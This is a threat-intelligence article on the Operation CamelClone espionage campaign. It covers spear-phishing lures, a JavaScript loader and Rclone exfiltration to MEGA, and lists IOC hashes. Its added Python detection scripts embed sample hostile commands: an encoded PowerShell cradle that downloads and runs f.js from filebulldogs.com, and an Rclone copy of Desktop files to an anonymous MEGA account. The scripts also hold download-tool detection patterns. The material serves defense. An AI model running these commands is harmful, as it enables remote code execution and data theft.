Researchers have uncovered a new cyber espionage campaign, dubbed Operation CamelClone, targeting government and strategic sectors across several geopolitically significant regions.
The campaign abuses legitimate tools and public file‑sharing platforms to deliver malware and steal sensitive data, which makes the activity harder for defenders to distinguish from ordinary traffic.
The operation primarily targets organizations linked to government and national security interests. Industries affected include:
- Government agencies.
- Defense and military organizations.
- Foreign affairs and diplomatic institutions.
- Policy and international cooperation departments.
- Energy and strategic resource sectors.
Seqrite Labs APT Team, which has been monitoring threats across the globe, observed activity targeting Algeria, Mongolia, Ukraine, and Kuwait. Although these countries appear unrelated, each plays a key role in current geopolitical dynamics.
Ukraine remains at the center of the ongoing conflict with Russia, while Algeria’s role as a major energy exporter places it at the intersection of European, Russian, and Chinese interests.
Mongolia’s diplomatic balancing between Western nations and its neighbors China and Russia makes it an attractive intelligence target.

Meanwhile, Kuwait remains an important defense and security partner in the Gulf region. The lure themes used in the attacks closely mirror these geopolitical tensions.
Spear‑Phishing Lures
The campaign begins with malicious ZIP archives distributed via spear‑phishing. These archives contain a shortcut (LNK) file and a decoy image designed to appear legitimate.
Researchers first identified the campaign after discovering a file named وزارة_السكن_والعمران_والمدينة.png.zip that had been uploaded to VirusTotal from Algeria.

The Arabic filename translates to “Ministry of Housing, Urban Development, and the City,” suggesting the attackers attempted to impersonate an Algerian government entity.
Further analysis revealed additional lures targeting different regions:
- A Mongolian‑language archive whose name translates to “Expanding cooperation with China.zip”, aimed at Mongolian government institutions.
- “Algerian Ukrainian proposals for cooperation.zip” referencing diplomatic collaboration.
- “Weapons requirements for the Kuwait Air Force.zip” targeting defense procurement personnel.
Each archive contained a decoy image featuring official logos from real organizations, such as Algeria’s Ministry of Housing, Mongolia’s state‑owned nuclear energy company MonAtom LLC, and the Kuwaiti Armed Forces.
The attack chain begins when a victim opens the malicious LNK shortcut file inside the ZIP archive. The shortcut executes a hidden PowerShell command that downloads additional payloads from the anonymous file‑sharing site filebulldogs[.]com.
A second lure document is also retrieved from the same remote server during a later stage of the infection chain.

The downloaded payload is a JavaScript loader tracked by researchers as HOPPINGANT. The script runs under Windows Script Host and executes Base64‑encoded PowerShell commands to fetch additional components and prepare the system for data theft.
During the next stage, the loader downloads:
- A decoy PDF document, padded with null bytes, that is shown to the victim as a distraction.
- A secondary archive containing an executable file named l.exe.
Analysis revealed that l.exe is a legitimate version of Rclone (v1.70.3), a widely used command‑line tool designed to synchronize files with cloud storage services.
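The chain above (shortcut, hidden Base64‑encoded PowerShell, download from filebulldogs[.]com, HOPPINGANT run by Windows Script Host) leaves a recognisable trail in process‑creation telemetry. The following Python is an added example, not code from the Seqrite Labs report: it triages constructed Sysmon‑style records (ParentImage / Image / CommandLine) for that trail. The sample events, the benign management agent, and all file paths are constructed for illustration; the staging host is the one named in the report.

```python
"""Triage process-creation events for the LNK -> PowerShell -> WSH chain described above.

Added example, not code from the original report. The events below are constructed
Sysmon-style records (ParentImage / Image / CommandLine), not real telemetry.
"""
import base64
import re
from typing import List, Optional


def _enc(ps: str) -> str:
    """Encode a script the way PowerShell -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(ps.encode("utf-16le")).decode()


# Constructed sample events (paths and the benign agent name are assumptions).
SAMPLE_EVENTS = [
    {   # 1: what the malicious shortcut launches
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc "
        + _enc(r"iwr https://filebulldogs.com/dl/x/f.js -OutFile $env:TEMP\f.js; wscript $env:TEMP\f.js"),
    },
    {   # 2: benign encoded command issued by a management agent
        "ParentImage": r"C:\Program Files\Agent\agent.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -EncodedCommand "
        + _enc("Get-Service | Where-Object Status -eq 'Running'"),
    },
    {   # 3: HOPPINGANT-style loader executed by Windows Script Host
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r"wscript C:\Users\victim\AppData\Local\Temp\f.js",
    },
]

STAGING_HOSTS = ("filebulldogs.com",)  # from the report; extend with your own intel
CRADLE_RE = re.compile(
    r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"start-bitstransfer|curl|wget)\b", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match all of them.
ENC_RE = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|"
    r"encodedcomm|encodedcomma|encodedcomman|encodedcommand)\b\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None if there is none."""
    for m in ENC_RE.finditer(cmdline):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def analyze_event(event: dict) -> List[str]:
    """Return the reasons an event matches this chain (empty list = nothing to report)."""
    reasons: List[str] = []
    cmd = event["CommandLine"]
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    decoded = decode_encoded_command(cmd) if image.endswith("powershell.exe") else None
    # Inspect the decoded script plus the command line with the Base64 blob removed,
    # so keyword matches cannot be triggered by coincidental substrings of the blob.
    text = ENC_RE.sub(" ", cmd) + (" " + decoded if decoded else "")

    if decoded is not None and parent.endswith("explorer.exe") \
            and re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        reasons.append("hidden encoded PowerShell spawned by Explorer (shortcut launch)")
    if CRADLE_RE.search(text):
        reasons.append("download cradle in command line")
    for host in STAGING_HOSTS:
        if host in text.lower():
            reasons.append(f"contacts staging host {host}")
    if image.endswith(("wscript.exe", "cscript.exe")) \
            and re.search(r"\.js\b", cmd, re.I) \
            and re.search(r"\\(temp|appdata|downloads|public)\\", cmd, re.I):
        reasons.append("Windows Script Host running .js from a user-writable path")
    return reasons


def triage(events) -> List[dict]:
    """Keep only the events that produced at least one reason."""
    hits = []
    for ev in events:
        reasons = analyze_event(ev)
        if reasons:
            hits.append({"Image": ev["Image"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["Image"])
        for reason in hit["reasons"]:
            print("  -", reason)
```

Feeding real Sysmon Event ID 1 (or Security 4688 with command‑line auditing enabled) records into `analyze_event` is the only change needed to run this against live data; the benign agent event shows why Base64 alone is not a signal and why the decoded content has to be inspected.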
Data Exfiltration via Rclone and MEGA
Once Rclone is in place, the script writes a configuration that points it at MEGA cloud storage. The account password is embedded in the malware, obfuscated only with a simple XOR encoding.

The attackers create remote storage profiles using anonymous onionmail[.]org email addresses, including:
- coreyroberson@onionmail[.]org.
- keatonwalls@onionmail[.]org.
- oliwiagibbons@onionmail[.]org.
- theresaunderwood@onionmail[.]org.
The malware then collects documents from the victim’s system, focusing on .doc, .docx, .pdf, and .txt files located in the Desktop directory.
It also attempts to steal Telegram Desktop session data, which could allow attackers to access private communications.
All collected files are uploaded to MEGA using Rclone with identical configuration settings across all observed samples.
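Because the exfiltration tool is an unmodified Rclone, detection has to key on how it is used rather than on the binary itself: a renamed copy, a configuration naming a MEGA remote registered to an anonymous mailbox, and a copy of Desktop or Telegram data to that remote. The Python below is an added hunting example, not code from the Seqrite Labs report. The rclone.conf text, the process record, the remote name, and the file paths are constructed for illustration; the onionmail[.]org address is one of those listed above, and `type`, `user`, and `pass` are the real keys Rclone uses for a MEGA remote.

```python
"""Hunt for the Rclone-to-MEGA exfiltration pattern described above.

Added example, not code from the original report. The rclone.conf text, the process
event and the file paths are constructed; the onionmail address is one the report lists.
"""
import configparser
import re
from typing import Dict, List

# Constructed rclone.conf as the loader might write it. The remote name and the
# obscured password value are placeholders; type/user/pass are rclone's real mega keys.
SAMPLE_RCLONE_CONF = """\
[remote]
type = mega
user = coreyroberson@onionmail.org
pass = 0bscur3dValuePlaceholder
"""

# Constructed Sysmon-style process-creation record for the renamed Rclone binary.
SAMPLE_EVENT = {
    "Image": r"C:\Users\victim\AppData\Local\Temp\l.exe",
    "OriginalFileName": "rclone.exe",  # Sysmon reads this from the PE version resource
    "CommandLine": (
        r'C:\Users\victim\AppData\Local\Temp\l.exe copy "C:\Users\victim\Desktop" remote:docs '
        r'--include *.doc --include *.docx --include *.pdf --include *.txt '
        r'--config C:\Users\victim\AppData\Local\Temp\r.conf'
    ),
}

CLOUD_TYPES = {"mega", "drive", "dropbox", "onedrive", "box", "pcloud", "s3", "b2"}
ANON_MAIL_DOMAINS = ("onionmail.org",)  # from the report; extend as needed
RCLONE_VERBS = {"copy", "copyto", "move", "moveto", "sync"}
SENSITIVE_SOURCES = (r"\desktop", r"\telegram desktop\tdata", r"\documents")


def parse_rclone_remotes(conf_text: str) -> List[Dict[str, str]]:
    """Return one dict per [section] of an rclone.conf, which is plain INI."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    return [{"name": s,
             "type": cp.get(s, "type", fallback=""),
             "user": cp.get(s, "user", fallback="")} for s in cp.sections()]


def _tokens(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def is_remote_spec(token: str) -> bool:
    """True for an rclone 'remote:path' target; a drive letter such as C:\\ is not one."""
    m = re.match(r"^([A-Za-z0-9][A-Za-z0-9_ -]*):(.*)$", token)
    if not m:
        return False
    name, rest = m.groups()
    return not (len(name) == 1 and rest[:1] in ("\\", "/"))


def parse_rclone_command(cmdline: str) -> dict:
    """Extract verb, source, destination remote, --config path and --include filters."""
    toks = _tokens(cmdline)
    out: dict = {"verb": None, "source": None, "destination": None, "config": None, "includes": []}
    i = 0
    while i < len(toks):
        t = toks[i]
        if out["verb"] is None and t.lower() in RCLONE_VERBS:
            out["verb"] = t.lower()
        elif t == "--config" and i + 1 < len(toks):
            out["config"] = toks[i + 1]
            i += 1
        elif t.startswith("--config="):
            out["config"] = t.split("=", 1)[1]
        elif t == "--include" and i + 1 < len(toks):
            out["includes"].append(toks[i + 1])
            i += 1
        elif out["verb"] is not None and not t.startswith("-"):
            if is_remote_spec(t):
                out["destination"] = t
            elif out["source"] is None:
                out["source"] = t
        i += 1
    return out


def is_renamed_rclone(event: dict) -> bool:
    """OriginalFileName survives a rename of the file on disk, so compare the two."""
    on_disk = event["Image"].rsplit("\\", 1)[-1].lower()
    return event.get("OriginalFileName", "").lower() == "rclone.exe" and on_disk != "rclone.exe"


def hunt(event: dict, conf_text: str) -> List[str]:
    """Combine process and configuration evidence into analyst-facing reasons."""
    reasons: List[str] = []
    if is_renamed_rclone(event):
        reasons.append(f"rclone.exe running under a different name: {event['Image']}")
    cmd = parse_rclone_command(event["CommandLine"])
    remotes = {r["name"]: r for r in parse_rclone_remotes(conf_text)}
    if cmd["verb"] and cmd["destination"]:
        rname = cmd["destination"].split(":", 1)[0]
        remote = remotes.get(rname)
        if remote and remote["type"] in CLOUD_TYPES:
            reasons.append(f"{cmd['verb']} to {remote['type']} remote '{rname}' as {remote['user'] or '<no user>'}")
            if remote["user"].lower().endswith(ANON_MAIL_DOMAINS):
                reasons.append("remote account uses an anonymous mail provider")
    src = (cmd["source"] or "").lower()
    if any(s in src for s in SENSITIVE_SOURCES):
        reasons.append(f"source is a user-data location: {cmd['source']}")
    return reasons


if __name__ == "__main__":
    for reason in hunt(SAMPLE_EVENT, SAMPLE_RCLONE_CONF):
        print("-", reason)
```

In practice the configuration file is recovered from the `--config` path on the host (or from the default `%APPDATA%\rclone\rclone.conf`) and fed to `hunt` alongside the process event; a hit on any two of the four reasons is a strong indicator, since legitimate Rclone use rarely involves a renamed binary or an anonymous mailbox.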
Instead of deploying traditional command‑and‑control servers, the threat actors rely on public services.
The filebulldogs[.]com platform hosts the malware loader, payload archives, and decoy files. A different upload path is used for each campaign instance, which lets the attackers run several operations in parallel and limits the damage if any single path is taken down.
Researchers have not attributed Operation CamelClone to any known threat group. However, the campaign’s focus on government, defense, diplomatic, and energy organizations suggests a cyber‑espionage objective rather than financial gain.
Seqrite Labs continues to monitor the activity and believes the campaign reflects an intelligence‑gathering effort aimed at understanding the foreign policy positions, defense capabilities, and diplomatic alignments of countries navigating global geopolitical rivalries.
IOCs
| SHA-256 Hash | File Name |
|---|---|
| 31f1a97c72f596162f0946df74838d3bef89289ce630adba8791c0f3220980ee | وزارة_السكن_والعمران_والمدينة.png.zip |
| 51af876b0f7fde362c69219f7dec39f7fb667fb53dc5fe2cbdf841d6c5951460 | Weapons requirements for the Kuwait Air Force.zip |
| 27d7a398a58c12093bc49f7144dac2f079232768096d0558c226ea5c53782e29 | Algerian Ukrainian proposals for cooperation.zip |
| 4a0e2649f89e11121ffe55546ee081ac07472db650d094314414ebf26fcb7a8e | Хятад улстай хамтын ажиллагаагаа өргөжүүлж байна.zip |
| 92962bfa6df48ec0f13713c437af021f4138dc5a419bc92bc8a376d625a6519a | دعوة للمشاركة.lnk |
| 1d0ea66d347325902e20a12e1f2f084be45d3d6045264e513dcc420b9928013c | Weapons requirements for the Kuwait Air Force.lnk |
| 2671e1f43b2e5911310c5b3f124c076055eec5dee4e596854332ffcf791fd740 | Algerian Ukrainian proposals for cooperation.lnk |
| 2902cdee050a60c3129b4bb84e74ddda7b129c3473556f689d83609d9a5981a7 | Хятад улстай хамтын ажиллагаагаа өргөжүүлж байна.lnk |
| 630ac67d8db777ae0b93e066bd13b21908e79f23a41a64448f0a4ea38c063a44 | f.js |
| 230a22a1f1800f11718b43a7ce9390d2ef0fa9dc212d954c8fafbfbe997bbbef | f.js |
| 62c477c0827752ffeb8ea243497eef1c666fc41025d287909d021bceb5b8e699 | f.js |
| 2dcaaedfad798dad87f27aef39885d2879825c4c8bed1dcd9e863aba0d463103 | f.js |
| 3e36b396c4cb71b8eaae2300c21bec26700b27ce5f6be83ef6b86d214e294c8b | l.exe |